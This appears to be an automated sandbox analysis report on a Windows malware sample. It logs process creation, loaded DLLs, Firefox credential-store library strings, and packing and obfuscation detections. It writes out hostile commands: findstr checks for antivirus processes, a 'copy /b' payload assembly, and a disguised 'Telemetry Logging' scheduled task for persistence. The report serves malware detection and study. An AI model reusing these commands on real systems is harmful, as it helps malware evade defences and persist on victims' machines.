Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Pct.pif, Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Pct.pif, 0000000B.00000003.3651095372.000000001D771000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000003.3665238064.000000001D765000.00000004.00000800.00020000.00000000.sdmp, JJKFBFIJJECGCAAAFCBG.11.dr, HCFBAFIDAECAKFHJDBAF.11.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Pct.pif, 0000000B.00000002.3819529518.000000001D87B000.00000004.00000800.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3830540693.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 627982
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VoipBiographiesScholarPorno" Dis
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Omissions + ..\Involve + ..\Retro + ..\Official + ..\Network + ..\Unlike + ..\Relates K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Pct.pif K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\KFCFBFHIEB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\KFCFBFHIEB.exe "C:\ProgramData\KFCFBFHIEB.exe"
Source: C:\ProgramData\KFCFBFHIEB.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 627982 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VoipBiographiesScholarPorno" Dis Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Omissions + ..\Involve + ..\Retro + ..\Official + ..\Network + ..\Unlike + ..\Relates K Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Pct.pif K Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\KFCFBFHIEB.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\KFCFBFHIEB.exe "C:\ProgramData\KFCFBFHIEB.exe" Jump to behavior
Source: C:\ProgramData\KFCFBFHIEB.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\KFCFBFHIEB.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\KFCFBFHIEB.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\KFCFBFHIEB.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\KFCFBFHIEB.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: Pct.pif, 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.11.dr, mozglue.dll.11.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
Source: Binary string: nss3.pdb@ source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
Source: Binary string: softokn3.pdb@ source: softokn3.dll.11.dr, softokn3[1].dll.11.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr, vcruntime140[1].dll.11.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
Source: Binary string: nss3.pdb source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
Source: Binary string: mozglue.pdb source: Pct.pif, 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.11.dr, mozglue.dll.11.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.11.dr, softokn3[1].dll.11.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\ProgramData\KFCFBFHIEB.exe Unpacked PE file: 22.2.KFCFBFHIEB.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 25.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
PE file contains sections with non-standard names
Source: softokn3.dll.11.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.11.dr Static PE information: section name: .00cfg
Source: KFCFBFHIEB.exe.11.dr Static PE information: section name: .MPRESS1
Source: KFCFBFHIEB.exe.11.dr Static PE information: section name: .MPRESS2
Source: l3[1].exe.11.dr Static PE information: section name: .MPRESS1
Source: l3[1].exe.11.dr Static PE information: section name: .MPRESS2
Source: freebl3.dll.11.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.11.dr Static PE information: section name: .00cfg
Source: mozglue.dll.11.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.11.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.11.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.11.dr Static PE information: section name: .didat
Source: nss3.dll.11.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.11.dr Static PE information: section name: .00cfg
Source: oobeldr.exe.22.dr Static PE information: section name: .MPRESS1
Source: oobeldr.exe.22.dr Static PE information: section name: .MPRESS2
Uses code obfuscation techniques (call, push, ret)
